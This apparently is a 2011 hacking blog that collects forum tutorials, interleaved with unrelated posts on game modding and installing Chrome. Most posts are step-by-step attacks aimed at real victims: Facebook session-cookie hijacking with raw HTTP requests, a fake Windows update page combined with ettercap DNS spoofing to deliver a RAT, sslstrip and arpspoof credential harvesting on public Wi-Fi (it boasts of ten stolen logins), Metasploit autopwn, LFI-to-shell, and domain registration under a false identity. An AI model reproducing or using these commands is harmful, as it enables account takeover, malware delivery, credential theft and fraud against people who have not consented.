Powered By Blogger

Sunday, July 24, 2011

Controlling facebook accounts [No Pasword][Non-Script Kiddie Tut]

Login to your Facebook account and sniff your cookie OR collect a few live Facebook Biscuit/s of your Target/s.

1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older than FaceBook.COM's current SYSTIME.

2 ] Send a GET Request to www.facebook.com port 80 after calculating the required variables (below)

GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US

3 ] From the Response Obtained :
Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other Post Request

Calculating post_form_id
Search for
This will be your post_form_id at the later stage in the Status Update Page / Other Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post Request

Your login_x actually looks like
But keep it unchanged in the hex format.

4 ] Send a GET Request like below with the above calculated variables :

GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 HTTP/1.1
Accept: */*
Accept-Language: en-US
x-svn-rev: 161013
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php

5 ] In the output :
Search for Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)

6 ] Generate a new POST Request with the above calculated new variables :

POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F%2Fwww.facebook.com%2Fhome.php


7 ] Use the above variables to view any content with the appropriate GET / requests

8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)

[PHP]Php Shell R00TSH3ll[SHELL]

Hey guys I made my own php shell that any one can use plz do not edit otherwise in further version with huge improvments will be encrypted to base64.
heres link:
R00TSH3ll Beta 2 Build 3
311 KB.

Hijacking Facebook with cookies !!! (Multi-Platform)

Download to FBController
This is facebook controller v3.
Software Required:
Backtrack5 or Windows or other distros that have WINE (BT comes with WINE)
Mantra (Comes with BT5) otherwise goto: Mantra HOmepage
gedit / notepad
Ok, start up mantra and go to facebook.com and goto your victims wall.
Goto firebug then to Firecookie and view the cookies.
Open up COOKIE text file and match cookies in mantra with COOKIE text file with victims information and save it when your finished.
then load up Command Prompt if your in Windows. If not goto WINE explorer and goto C:\Windows\System32\ and hit cmd.exe then it will WINE's command prompt that work just like windows goto the directory of fbcontrolller and use this synatx.
FBController COOKIE.txt then if its successfull then it will show multiple options to compromise facebooks account.
By reading this tutorial and downloading the file your responsible not hini or author of these software.
~ This tutorial was written by HiniAes do not leech.

Tuesday, July 19, 2011

Tutorial How to Install Google Chrome on BT5 same as Ubuntu

Installing Google Chrome on Backtrack 5

Google Chrome can be installed in many ways, on Ubuntu 11.04. Here I’ll explain few simple methods. You can also install Chromium (almost similar to Google Chrome), it is available in Ubuntu Software Center or Synaptic Package Manager. Just follow the steps -
step #1 : Go to its official website and download the Debian Package. Google Chrome version 10.x.* is the latest one.
Download the Google Chrome for Backtrack5
step #2 : Open the saved file with Ubuntu Software Center (Right Click on the Package, then select Open With USC; click on install Button to proceed) or Use the dpkg command to install the package. To install from the command line, type the command given below and enter your login password to proceed.
dpkg -i google-chrome-stable_current_i386.deb
step #3 : That’s all.. No more steps.. Enjoy surfing with Chrome.
Here is one snapshot, how Google Chrome looks on BT5

Get Free Domain [Fraud + Knowledge]

On no account I would be held responsible of your act.

1. Google Chrome (to translate) Download: http://6660e7e2.spam.com
2.e-mail address!

First, go to: http://1c2e4b4b.spam.com
Ok, now enter the domain you want

Select one of the available domain that you want

Click the Next button

Select a hosting package and click "Order Now"

Click next button

Now, you need to enter personal information! Of course, you will not do that unless you are idiot! You need to create a false identity, how? Follow these instructions! Go to: http://576d357f.spam.com and fill empty seats false data. In doing so, click generate!
And there complete the form false information!

Now you will be prompted to enter your name and number of accounts. You will not do that (unless you are retard) but you will add information from the previous step!

You will now see the details of the order!

Check the box that says "I have read the terms etc" and then click "close order"

And finally, it will ask you to confirm your order!

It is better to hack credit and then register a domain, but i will show you that maybe some other time ...

PS: Replace spam to link bucks (without space)
Have fun :D

How to make ANY email address

This page from Microsoft lets you use any email domain like fbi.gov, facebook.com, and admin.tk anything!!!!

Go to that link there you go!!!

Monday, July 18, 2011

Heres my new deface page

20x.cc seems to be down :( cant upload there + i lost my rootshell
at beta 3 and build 3 only have beta 2 build 3

Wednesday, July 13, 2011


Ok first of all what you need to run this attack using the method i will show you:
-You need to be running a backtrack OS [3/4/R1]
-To be connected to a wireless network [Any form of encryption]
-Wireless traffic

And thats it! This is going to be a short but sweet tutorial!

**This guide is intended for the sole purpose of penetration testing only**

Running Backtrack
I think that there are other methods of performing this attack that don't depend on you running Backtrack, but since i am assuming that you have cracked a network running backtrack i don't see why this should be a problem. Also this method is very easy;]

First of all you need to be running a version of backtrack, for more information on how to do this, click the link to my WPA/WPA2 cracking tutorial at the top, that covers several methods of booting backtrack from all OS's.

Finding targets
Second of all You need to be connected to a wireless network with network traffic; this can basically be anywhere and any form of wireless network, if you are connected you can attack!

A good method of maximising the affect of this attack is to target wi-fi networks with as many clients as possible, preferably in a public place. Prime examples are unsecured networks in hotels, schools, offices, cafe's and any free public wi-fi spots. These are great as they don't require any cracking!


However if you have cracked a network, then you can use your wi-fi adapter that is capable of going into monitor mode to search for the best wi-fi network. The most common wi-fi adapter capable fo doing this is the ALFA AWUS036H, for more information and info on how to monitor wireless networks and spoof MAC addresses refer to my WPA/WPA2 cracking tutorial. This will allow you to better survey the area and choose a target network with the most clients.

Spoofing your MAC address
If you want to be safe then it is a good idea to spoof your MAC address, luckily for this attack you don't need a wireless card capable of packet injection any card should do fine =] This means that you only need to type the following into a terminal
ifconfig wlan0 down
macchanger -s wlan0
macchanger -m 00:11:22:33:44:55 wlan0
ifconfig wlan0 up

Where i have written wlan0 you will have to put the name of your wireless interface; however unless you have two wireless cards it is most probably "wlan0". If yu do have 2 wireless cards then you will know what to do ;]

The attack
This is the easy part! all you need to do is enter the following into a terminal
echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sslstrip -w passwords

This will forward all wi-fi traffic back to the client so no one gets suspicious. It will also create a document on your desktop called "passwords" leave this well alone for now. Another key part of this attack is SSLstrip, this allows you to steal the info from secure web pages. (Hotmail, Facebook, Gmail, Ebay etc...)

Now leave that terminal open and open a new one. Now we need to find out the name of the gateway that we will be redirecting traffic to. To do this simply type "route" into the terminal and wait for a minute.

You should see something like this:
[Image: inqL8.png]
As you can see from this the gate way that my wi-fi traffic is going through is called "BThomehub.Home"; and the interface connected is wlan1 We now use this info when entering the next command.

Side note: You can also use:
route -n | grep 'UG[ \t]' | awk '{print $2}'
To show the IP address of the router. This is much more reliable as sometimes the gateway can be cut off. This is also useful if you are using ettercap.

arpspoof -i <interface> <gateway>

This will commence the MITM attack the screen should look something like this:
[Image: insTG.png]
Now leave both of the open terminals running, they are now capturing all of the data sent across the wi-fi. Have a coffee, do your homework, go to a meeting. The longer you leave it the higher chance you will have of catching something juicy!

Processing the data
You will now have a large text or html file on your desktop, these are your results, don't open them just yet. Protip: If you have a slow computer with a low amount of RAM don't leave your MITM attack running for too long or you could generate a text file too large for your computer to handle! Now close down your two terminals and open the text file in your favorite editor. I just use Kate advanced text editor; Which ever one you use it needs to have a search function.

I would upload some screen caps of me doing this but i don't have any one to target to generate the file =[ so sorry about that.

In Kate once you have opened the file press F3 [or just CTRL+F in another editor] to search through the document. In Kate you want to un-tick "case sensitive".

Now the fun bit! Search the document for the following:

Be creative and think for others. Bascially keep searching through the document unitl you come across "username=Middle, password=i<3HF" then look above for the website they were on and walla you have acquired a login!

In under 2 hours in a hotel with unsecured wi-fi i got 10 logins: 2 Hotmail, 3 Facebook, 4 Gmail and one for "Gay.com" XD

Hope you enjoyed, please leave feedback =]

This attack also works for wired connections, to do this you need to change the interface you use to the interface that is connected to the wired network. To determine what this device is use the following.

Now just look for the interface that has the IP address and use that instead of wlan0. All credits go to ac1dxtrem for this protip =]


Airdrop-ng tutorial - Rule Based Deauth

This tutorial is based in backtrack4 and i'll assume you are competent with linux to the standard this tutorial requires. You must also have a packet injection/monitor mode supported wireless interface.

Capturing Your Surrounding's
First we need to capture the wireless activity in the area.

airmon-ng [to check the interface you will be using]
airmon-ng start wlan0 [starts the interface 'wlan0', change it accordingly]
airodump-ng mon0 -w capture --output-format csv ['mon0' is your interface in monitor mode, and csv is the output filetype of the captured information with a filename in this example of 'capture']

This step you can do previous to capturing the file if you have a specific target you know the MAC address of, but normally is done afterwards so you can review the output in the terminal of airodump-ng [last command above].

MAC Rules Info
We need to understand a basic formula for how the 'rules' work within airdrop-ng, a = allow whereas d = deny, I know rocket science isn't it lol. This is where it gets to the good bit. The format of each rule whether it's allow or deny access is allow(a) or deny(d) then bssid's MAC followed by the client's MAC. Below are example of how it would look.

Allow rule: a/bssid MAC ['any']|slave's MAC ['any']

Deny rule: d/bssid MAC ['any']|slave's MAC ['any']

However, you may wonder what the 'any' is for. Well if you decide you don't want anyone to connect to a bssid then you would put this for example:

d/00:11:22:33:44:55|any [00:11:22:33:44:55 being the bssid you wish to alienate]

To do the opposite and allow a MAC to not connect to anything:

d/any|00:11:22:33:44:55 [00:11:22:33:44:55 being in this example the client you wish to block.

Implementing MAC Rules
To put the rules in place we need to setup a 'rules' file which airdrop will read and implement the rules from. To add rules to the file we do so thus:

echo '#D' > rules && echo 'd/any|xy:xy:xy:xy:xy:xy' >> rules [this command will create the file 'rules' on your desktop and enter the above rule under the heading '#D']

The contents will look like this [remember i'm using D to remind you this is Deny!!

Running Airdrop-ng
Installing Airdrop through synaptic is what i'll advise you to do as it places everything in the right place for you to follow this tutorial. Navigate using terminal to the airdrop directory:
cd /pentest/wireless/airdrop-ng/

Once there we start airdrop-ng:
airdrop-ng -i mon0 -t /capture.csv -r /rules [-i = interface, -t = capture file and -r = rules file. You can also run a rule debugging mode which is activated by using -b after rules e.g. airdrop-ng -i mon0 -t /capture.csv -r /rules -b]

We next have to understand a very important concept in the rules file reading process done by airdrop-ng. The program reads from top to bottom so allow rules applying to a specific MAC but come before deny rules applying to the same MAC. Using another example i'll demonstrate.

[we've now blocked all access to a AP/bssid, but then we decide we want a specific MAC only to connect to it. This must but done as shown below].


As you can see above our original rule of denying every connection to the AP is below the rule to grant/allow access to the one MAC/client. This must be done in this format!! To make alterations to the rules file use for following command:

nano rules [you can use other text editor's but I prefer nano, it's down to personal preference]

Note: alot of cases have been reported on a few forums of airdrop not responding to more than the 1st allow rule. So have one allow and the rest denials.

OUI [Organizationally Unique Identifier] Hardware names
Airdop also had the function to allow or deny based on the OUI and hardware names [but not to the same extent]. It is implmented in the same way as the MAC's, I won't be giving out a tutorial on this part because it's had hit and miss results and i've not personally tried it only the MAC deauth.
However, the OUI list is located below:
nano /pentest/wireless/airdrop-ng/support/oui.txt

To update the OUI list use:
airdrop-ng -u

How does this tutorial help you?
If you combine my other tutorial on SSL sniffing and SoftAP's with this, you could hijack someones AP, route traffic through your softAP using their connection, ban all access to the original AP and palm your AP off as the original using the airdrop-ng rule system.

Get your R.A.T onto a pc

This is how to get someone to download your rat if you're on the same network

This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering he same damn question over and over again..

Start by downloading backtrack 4 and burning the iso.


Boot into backtrack and open the file browser, and browse to /var/www/. There will be file called index.html.
Open it with kate (or some other text editor) delete the code that is in there and copy in the following code.

<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
<p align="center" class="style2"></p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
<p align="left" class="style4">&nbsp;</p>

Now copy your rat into the same directory and name it windowsupdate.exe

Start apache

/etc/init.d/apache2 start

open firefox and navigate to Your fake update page should show up.

Now set up the dns_spoofing configuraton

echo "* A" >> /usr/share/ettercap/etter.dns

Replace with your own ip (ifconfig)

Use nmap to find your target ip

nmap -sP your_subnet/24

Now arp-poison with ettercap using the dns_spoof plugin.

ettercap -T -i wlan0 -M arp:remote / / -P dns_spoof

replace with your target's ip.
replace with your gateway ip.
replace wlan0 with your interface.

If you want to target everyone on the network you can use the following command.

ettercap -T -i wlan0 -M arp:remote / // -P dns_spoof

Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.

Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.

ipconfig /flushdns

This will let them browse again.

Monday, July 11, 2011

Session Hijacking Basic[Ezine]

Session Hijacking Basic

__               _                      _  _            _    _             
/ _\ ___  ___ ___(_) ___  _ __     /\  /(_)(_) __ _  ___| | _(_)_ __   __ _ 
\ \ / _ \/ __/ __| |/ _ \| '_ \   / /_/ / || |/ _` |/ __| |/ / | '_ \ / _` |
_\ \  __/\__ \__ \ | (_) | | | | / __  /| || | (_| | (__|   <| | | | | (_| |
\__/\___||___/___/_|\___/|_| |_| \/ /_/ |_|/ |\__,_|\___|_|\_\_|_| |_|\__, |
                                         |__/                         |___/ 

# language: English
# Title: Session Hijacking Basic
# Date: 2011-01-13
# Author: Filipe Barros/@barros_filipe 

| +01 - Session Fixation
| +02 - Session Hijacking
| +03 - Firesheep

Have fun :)

====== +01 - Session Fixation ======

The attacker attempts to gain access to another user's session by posing as that user.

The information for an attacker is the session identifier, because this is required for any impersonation attack. There are three common methods used to obtain a valid session identifier:

* Fixation

* Capture

* Prediction

Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation.

Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been Internet Explorer, and cookies are slightly less exposed than GET variables. for those users who enable cookies, you can provide them with a more secure mechanism by using a cookie to propagate the session.

Fixation is the simplest method of obtaining a valid session identifier. While it's not very difficult to defend against, if your session mechanism consists of nothing more than session_start(), you are vulnerable.

To demonstrate session fixation, I'll use the following script, session-hijacking.php:

[ Begin PHP CODE ]



if (!isset($_SESSION['visits']))
    $_SESSION['visits'] = 1;

echo $_SESSION['visits'];


[ End PHP CODE ]

First make sure that you do not have an existing session identifier (perhaps delete your cookies), then visit this page with ?PHPSESSID=123456789 appended to the URL. Next, with a completely different browser (or even a completely different computer), visit the same URL again with ?PHPSESSID=123456789 appended. You will notice that you do not see 1 output on your first visit, but rather it continues the session you previously initiated.

If there isn't an active session associated with a session identifier that the user is presenting, then regenerate it just to be sure:

[ Begin PHP CODE ]



if (!isset($_SESSION['initiated']))
    $_SESSION['initiated'] = true;


[ End PHP CODE ]

The problem with such a simplistic defense is that an attacker can simply initialize a session for a particular session identifier and then use that identifier to launch the attack.

====== +02 - Session Hijacking ======

If your session mechanism have only session_start(), you are vulnerable.

With the most simplistic session mechanism, a valid session identifier is all that is needed to successfully hijack a session. In order to improve this, we need to see if there is anything extra in an HTTP request that we can use for extra identification.

Recall a typical HTTP request:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 Gecko
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789
Only the Host header is required by HTTP/1.1, so it seems unwise to rely on anything else. However, consistency is really all we need, because we're only interested in complicating impersonation without adversely affecting legitimate users.

Imagine that the previous request is followed by a request with a different User-Agent:

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla Compatible (MSIE)
Accept: text/xml, image/png, image/jpeg, image/gif, */*
Cookie: PHPSESSID=123456789

Although the same cookie is presented, should it be assumed that this is the same user? It seems highly unlikely that a browser would change the User-Agent header between requests, right? Let's modify the session mechanism to perform an extra check:

[ Begin PHP CODE ]



if (isset($_SESSION['HTTP_USER_AGENT']))
        /* Prompt for password */


[ End PHP CODE ]

Now an attacker must not only present a valid session identifier, but also the correct User-Agent header that is associated with the session. This complicates things slightly, and it is therefore a bit more secure.

Imagine if we required the user to pass the MD5 of the User-Agent in each request. An attacker could no longer just recreate the headers that the victim's requests contain, but it would also be necessary to pass this extra bit of information. While guessing the construction of this particular token isn't too difficult, we can complicate such guesswork by simply adding an extra bit of randomness to the way we construct the token:


$string = $_SERVER['HTTP_USER_AGENT'];
$string .= 'SHIFLETT';

/* Add any other data that is consistent */

$fingerprint = md5($string);


Keeping in mind that we're passing the session identifier in a cookie, and this already requires that an attack be used to compromise this cookie (and likely all HTTP headers as well), we should pass this fingerprint as a URL variable. This must be in all URLs as if it were the session identifier, because both should be required in order for a session to be automatically continued (in addition to all checks passing).

In order to make sure that legitimate users aren't treated like criminals, simply prompt for a password if a check fails. If there is an error in your mechanism that incorrectly suspects a user of an impersonation attack, prompting for a password before continuing is the least offensive way to handle the situation. In fact, your users may appreciate the extra bit of protection perceived from such a query.

There are many different methods you can use to complicate impersonation and protect your applications from session hijacking. Hopefully you will at least do something in addition to session_start() as well as be able to come up with a few ideas of your own.

====== +03 - Firesheep ======

Recently a firefox extension called Firesheep has exploited and made it easy for public wifi users to be attacked by session hijackers. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the firesheep user to easily access private information from cookies and threaten the public wifi users personal property.

Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way.

Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win.



[Version 0.3] Facebook chat sniffer

I threw this together in class yesterday because facebook was kicking me out when i tried to session hijack.

Version 0.3 http://pastebin.com/qNGuK9ix

save to fbsniff.py, set permissions, copy to sbin

chmod 755 fbsniff.py
cp fbsniff.py /usr/sbin/fbsniff

start the sniffer
tshark -i <interface> -w out.cap

start fbsniff
fbsniff -c out.pcap -l

you can also run it with a basic message filters
fbsniff -c out.pcap -f "Keegan,Test"

start ettercap
ettercap -T -M arp -i <interface> // // -P autoadd

Friday, July 8, 2011

BT5 + Metasploit + postgresql (works for me)

i'm working in this mode :

root@bt:~# apt-get install postgresql
root@bt:~# sudo apt-get install libpgsql-ruby
root@bt:~# sudo su postgres
sh-4.1$ createuser root -P
could not change directory to "/root"
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
sh-4.1$ createdb --owner=root metasploit
could not change directory to "/root"
sh-4.1$ exit
root@bt:~# msfconsole
msf > db_driver postgresql[*] Using database driver postgresql
msf > db_connect root:toor@
db_workspace -a MyProject
*] Added workspace: MyProject
msf > db_nmap -sS -O[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-14 15:27 CEST[*] Nmap: Nmap scan report for hackdany-cecb3e.homenet.telecomitalia.it ([*] Nmap: Host is up (0.00055s latency).[*] Nmap: Not shown: 997 closed ports[*] Nmap: PORT STATE SERVICE[*] Nmap: 135/tcp open msrpc[*] Nmap: 139/tcp open netbios-ssn[*] Nmap: 445/tcp open microsoft-ds[*] Nmap: MAC Address: 08:00:27:F1:F2:8F (Cadmus Computer Systems)[*] Nmap: Device type: general purpose[*] Nmap: Running: Microsoft Windows XP[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3[*] Nmap: Network Distance: 1 hop[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 3.56 seconds
msf > db_autopwn -p -e -q[*] (1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against[*] (4/51 [0 sessions............................etc...etc...et c
the work is perfect (FOR ME)

Thursday, July 7, 2011

Modding Golden Eye:rogue agent (concept of making halo)

Required Tools
TilEd 2002
Kiwi Ds Editor
A Hex Editor


extract your clean rom (unedited) with dslazy

Now you will have folders and files like this:


Editing The Games Icons

go to the data folder, inside the data folder there are many other folders,
to get to the icons go to the folder icons (surprised?)
try to preview one... (it wont work)
they aren't in the average windows format,

to edit them use tiled2002

Using TilEd 2002
Open up TilEd 2002
now click the Browser button (where the file button normally is)
Then click Open
navigate to your icons
they wont show up,
click where it says all compadible roms then click all files
then open up a icon (e.g DrNo.ico)
a jumble of random colors apears,
to fix this click SNES 4bb (see picture)


now you should get a picture like this image shows
to fix colors press buton indicated in previous picture.
(note this isn't the right pallette, could someone please make one?)

copy tiles to editer window then select paint mode
and edit in the editer window

(these arn't the virtual trainning icons... they are the ones that pop up when you have to verse "xenia onnatop" and other charachtors in campaighn.)

Text Editing
Objectives and stuff...
Editing Level Objectives Text
I will use Fort Knox as an Example
go to:
open 1_0_Crash.txt with notepad
now type in the new message (in the same space as the old one)
(try to keep similar length, otherwise falls of screen)
(for more space delete the empty lines between text (but not above the text!))
also works on all the other txt files in the level folders

Editing In Game Text
Remember this txt from level 1?

OR Even

its in Templates.Crt
open templates.crt in your hex editer then press CTR+F and search for the string you want (e.g "NUCLEAR DEVICE" or "YOUR PERSONAL" for guns just search for their names e.g "JACKAL")
edit to your every will (without adding extra hex bytes!), and thats a little more of this game hacked...

(You can edit some of this directly through the rom but it shows a message on boot up something like "Menus Edited Please Recompile")

Editing The Games Music/Sound
I'm not too sure about this but heres some info i got off the net

Extracting SDAT files
in dslazy/NDS_EXTRACT/data/Sounds there are some files (Sound_All.sdat ect)
open Kiwi Ds's Editor
then click File/open
navigate to dslazy/NDS_EXTRACT/data/Sounds
open file you want to extract,
it will then show upon the editor,
double click it.
this should bring up a new window, now select all.
then click extract selected.

Repacking SDAT files
open Kiwi Ds's Editor
then click Tools/Make SDAT
clck source files foledr (the ... button)
then navigate to the extracted files directory

Converting SSEQ to MIDI

copy SEQ_MUSIC0.sseq (exsample) to the sseq2mid-20070314\bin
create a new bat/batche file insert this code
sseq2mid.exe -1 SEQ_MUSIC0.sseq

this will give you a MID file,

Converting MIDI to SSEQ
kiwids released a program called mid2sseq, (link)
will use soon

Model Swapping Data
incorrect model swapping will cause the game to freeze,

your guns are labeled like 'ar4_commando.nsbmd'
your enemys guns are labeled like 'npc_assault_rifle.nsbmd'

i will work on a model swapping compadability list...
(probably on my own site so i can work in html)
Swapping Jackal and spec9 works (animations work to : shoot and reload)
replacing the minigun with 50 caliber machine freezes the game
this could be due to animation file incompadibilitys...

got me a PSP 1001 black (x2)

Yes, 2 psps with out battery but I do have charger for it, but I don't have Memory Stick Duo im going to buy one from my friend at July 16. Then when I get into psp game making im going to make Halo 2 PSP. Uses halo 2 sounds, and models from custom edition this should make it h2 version.

Wednesday, July 6, 2011

Metasploit Autopwn fix for Backtack 5

A lot of people are having trouble with Metasploit's Autopwn feature in Backtrack 5. It does require a little bit of tweaking to get going, below are a few steps to get you on your way.
I prefer to use postgreSQL over MySQL. This tutorial will only show how to properly configure Autopwn using postgreSQL.
First you must determine if you have postgres installed on your system. To do this type the following into a terminal:
ls /etc/init.d/ | grep post

If you do not see "postgresql-8.4" you need to update or install postgresql. This can be done using the repositories:
apt-get install postgresql-8.4 postgresql-client-8.4
Now start the postgreSQL server by typing:
/etc/init.d/postgresql-8.4 start
NOTE: If you receive an error like;
"The PostgreSQL server failed to start. Please check the log output:"
You will need to disable SSL in the config file. To do this
nano /etc/postgresql/8.4/main/postgresql.conf
Look for the section like the one below:
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s

#ssl = true # (change requires restart) You simply comment it out like I did above with the "#" sign.
Now restart postgres:
/etc/init.d/postgresql-8.4 start
Now connect to the server and change the password to whatever you want:
sudo su postgres -c psql

ALTER USER postgres WITH PASSWORD 'yoursecretpasswd ';

(make sure to use the quotation marks when setting your password, here is a real life example)

ALTER USER postgres WITH PASSWORD 'swordfish ';\q sudo passwd -d postgres

sudo su postgres -c passwd
(Here you want to use the same password you used a few steps back)

Postgresql is all setup, now to Metasploit.
Start Metasploit by typing: msfconsole
Once Metasploit starts, type: db_driver
If the driver is already loaded it will give an ouput like below.

If not, you will need to manaully load the driver by typing: db_driver postgresql
Now all you have to do is connect to your database by typing (pentest is the name of the database):
db_connect postgres:mysecretpassword@ autopwn

We are now connected and ready to run autopwn.
Run a nmap scan on the target:
db_nmap To see all of autopwn's options type: db_autopwn
Finally launch the autopwn and let sit back and wait:
db_autopwn -p -t -e -r

After autopwn completes type:
sessions -l Any successfull attacks will result in a session. To interact with that session type:
sessions -i 1 (where 1 is the session number)

Monday, July 4, 2011

[LFI]Local File Inclusion and shell upload[Tutorial]

LFI (Local File Inclusion)

1 – Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.

2 – Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.


- Now lets replace contact.php with ../ so the URL will become


and we got an error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Let̢۪s go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :


we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up


we succesfully included the etc/passwd file.

